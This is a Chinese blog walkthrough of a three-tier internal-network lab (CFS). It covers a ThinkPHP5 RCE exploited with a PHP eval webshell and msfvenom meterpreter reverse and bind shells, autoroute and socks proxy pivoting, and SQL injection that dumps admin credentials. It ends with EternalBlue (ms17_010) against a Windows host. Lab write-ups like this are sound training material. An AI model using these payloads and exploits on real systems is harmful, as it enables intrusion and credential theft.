内网渗透之CFS三层靶场渗透
环境搭建
网卡设置
kali为攻击机:192.168.3.57(桥接模式)
Target1:192.168.3.120(桥接模式),192.168.22.128(仅主机模式Vmnet2)
Target2:192.168.22.129(仅主机模式Vmnet2),192.168.33.128(仅主机模式Vmnet3)
Vmware的3个网卡分别配置为桥接,仅主机和仅主机,具体子网地址如图所示
宝塔后台设置
target1
在此处填入target1的ip
target2
加入target2的22网段ip
渗透测试
Target1
信息收集
nmap -sV -p 1-65535 -O 192.168.3.120
Target1中开启了ftp,ssh,http服务,并且是一个linux系统
分析利用
既然开放80端口,那就访问80端口,是一个tinkphp5的框架
thinkphp5有远程代码执行漏洞,用工具扫一下
检测工具地址
验证出来又漏洞,并且可以执行代码
写入后门文件
echo ‘<?php eval($_REQUEST[x]);?>’ > shell.php
访问shell.php,可以看到上传成功
使用蚁剑进行连接,这里是两个flag
msf上线
进行监听
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST kali的ip
set LPORT 1234
run
生成后门文件
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=kali的ip LPORT=1234 -f elf >a.elf
上传后门文件
进入终端执行后门文件
赋予执行的权限
chmod +x a.elf
./a.elf
msf中反弹会话
ifconfig进行ip的查看,发现target1有两张网卡,接下来对192.168.22.0/24进行探测
添加路由
获取网络接口:run get_local_subnets
查看路由地址:run autoroute -p
添加路由地址:run autoroute -s 192.168.22.0/24
获得三个网段
我们还没添加,所以还没有路由
添加路由后在次查看,已经添加上去
这时我们target的会话中已经可以和22网段进行通信了,但是其他会话还是不可以通信,接下来我们进一步配置
我们接下来使用socks4代理进行内网通信
background 保存拿到的shell会话,隐藏到后台
use auxiliary/server/socks_proxy
exploit
可以不用修改默认配置,使用本地的1080端口
修改proxychains-ng的配置文件
vi /etc/proxychains.conf
进行如下修改
需要加上刚刚配置好的代理文件才能进行扫描
target2
信息收集
proxychains4 nmap -Pn -sT 192.168.22.129
分析利用
发现80端口,我们设置好代理进行访问
进行简单的探测robots.txt后发现后台路径
访问后台,发现有验证码,就先不爆破
查看主页源代码发现有注入点
sql注入
既然如此我们就开整用sqlmap跑,但是我这里sqlmap跑不出来不知道为什么,有大佬知道能否私信我一下
proxychains4 sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” --dbs
proxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” -p keyword -D bagecms –tables
proxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin –columns
proxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin -C username,password –dump
那就手注吧
http://192.168.22.129/index.php?r=vul&keyword=1' union select group_concat(username),group_concat(password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from bage_admin-- -
md5解密,得到密码
后台探测
admin/123qwe进入到后台,得到flag
在模板中发现存在index.php,进行写入木马
蚁剑进行连接,我们所处的是3网段,要是想连接22网段的ip必须做一个代理,可以使用蚁剑自带的代理进行连接,也可以使用SocksCap64进行连接
连接成功
msf上线
生成正向后门
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > 3.elf
msf正向连接
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.129
set LPORT 3333
exploit
还是添加路由
获取网络接口:run get_local_subnets
添加路由地址:run autoroute -s 192.168.33.0/24
查看路由地址:run autoroute -p
target3
扫描33网段
proxychains4 nmap -Pn -sT 192.168.33.33
发现这是开放着445、3389端口的Windows系统 ,尝试使用永恒之蓝试试
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.33.33
run
利用成功,进入shell查找flag(shell里要是乱码可以使用chcp 65001进行解决)
总结
1.在连接target2的时候代理总是断开,反弹不了shell,后来重新启动msf,重新配置,最终获得了shell
2.proxychains4使用不了sqlmap,不清楚什么原因
3.整体思路就是,我们通过target1的thinkphp5的远程代码执行漏洞进行getshell,之后进行msf上线,添加路由,并且对内网进行信息收集,发现target2后进行信息收集,发现sql注入和后台地址,通过sql注入进行爆破后台账号密码,进行登录,在后台找到可以写入一句话的文件,进行连接,再次上线msf,添加路由,进行收集,找到target3
内网渗透之CFS三层靶场渗透相关推荐
- 内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)
前言 作者简介:不知名白帽,网络安全学习者. 博客主页:https://blog.csdn.net/m0_63127854?type=blog 内网渗透专栏:https://blog.csdn.net ...
- 内网安全:Cobalt Strike 工具 渗透多层内网主机.(正向 || 反向)
内网安全:Cobalt Strike 工具 渗透多层内网主机. Cobalt Strike 是一款以 metasploit 为基础的 GUI 的框架式渗透工具,又被业界人称为 CS.拥有多种协议主机上 ...
- 小白渗透0-1:BlackMarket靶场渗透记录
小白渗透0-1:BlackMarket靶场渗透记录 #环境 攻击机:kali 192.168.200.129 靶 机:BlackMarket 链接:https://pan.baidu.com/s/1S ...
- 内网渗透之CFS三层靶机搭建
前言 作者简介:不知名白帽,网络安全学习者. 博客主页:https://blog.csdn.net/m0_63127854?type=blog 内网渗透专栏:https://blog.csdn.net ...
- 渗透测试之CFS三层靶机内网渗透
一.环境搭建: 靶机拓扑: 1.添加虚拟网卡: 添加 22网段(VMnet2) 和 33(VMnet3)网段的网卡 VMnet8为NAT模式与外部通信 2.配置网卡: target1网络配置: tar ...
- 内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)
内网安全:内网渗透.(拿到内网主机最高权限) 内网穿透又被称为NAT穿透,内网端口映射外网,在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题.通过映射端口,让外网的电脑找到处于内 ...
- 内网渗透|红日安全团队靶场渗透笔记|Mimikatz|MSF跳板
靶场下载:漏洞详情 环境搭建: 文件下载下来有三个压缩包,分别对应域中三台主机: VM1对应win7是web服务器 VM2对应windows2003是域成员 VM3对应windows se ...
- 内网渗透建立代理通道(如何攻击目标内网机器?)-Socks代理(゚益゚メ) 渗透测试
文章目录 搭建靶场 配置虚拟机网络 虚拟机 上线目标1(Target1) Socks代理 简介 正向代理 反向代理 FRP 一层代理 二层代理(多层代理) EW 正向代理 反向代理 二层代理流量转发 ...
- 【VulnHub靶场】——CFS三层靶机内网渗透实操
作者名:白昼安全 主页面链接:主页传送门 创作初心:一切为了她 座右铭:不要让时代的悲哀成为你的悲哀 专研方向:网络安全,数据结构 每日emo:希望是你,最好是你,一定是你 嗨害嗨,我又回来啦,8月份 ...
最新文章
- 第六篇:Feedforward Networks 前向网络
- 了解下RDF Schema (RDFS)
- python语音播报-使用pyttsx3实现python语音播报
- RabbitMQ接触(二)
- matlab简单程序实例_【简单实例】如何使用C++加速python程序
- python才能做爬虫,No,C#也可以!
- linux虚拟arm环境环境,Ubuntu 模拟ARM开发环境
- Chapter 04-Using Conversion Functions and Conditional Expressions-Conditional Expressions
- java 文件名乱码_详解关于java文件下载文件名乱码问题解决方案
- SEFS安全透明加密内核
- R语言和Python交互
- Windows Terminal 使用 pem 文件连接服务器
- ArcGIS实验四 不同坡度植被覆盖率分析
- H3C s5820v2 堆叠2台机器配置说明
- 并发编程入门(五):Java并发包和Java8并发
- 基础——ROM, RAM, FLASH, SSD, DDR3/4, eMMC, UFS, SD卡, TF卡,相互关系
- python凤凰新闻数据分析(四)整合
- php时区设置为prc还是错误,关于php时区时间错误问题的解决,以及Unix时间戳转换工具...
- idea 启动项目找不到程序包,提示程序包不存在
- 第1条:考虑采用静态工厂方法代替构造器
热门文章
- 命运多舛。德体:多特蒙德队长罗伊斯因伤无缘卡塔尔世界杯
- 2021总结及智能设备汇总
- MKB0805心率血压模块使用方法
- java获取当前日期 星期几_java获取当前日期是星期几的方法
- 《东周列国志》第一回 周宣王闻谣轻杀 杜大夫化厉鸣冤
- wordpress如何制作一个跟随滑动的文章目录?Content Index文章目录插件修改篇
- CSS 列表样式(ul)
- 操作系统实验—ucore Lab1
- 华为android版本7.0,永不卡!华为手机全面升级安卓7.0:逆天
- xheditor form java_xheditor 上传图片 Jfinal处理 出现异常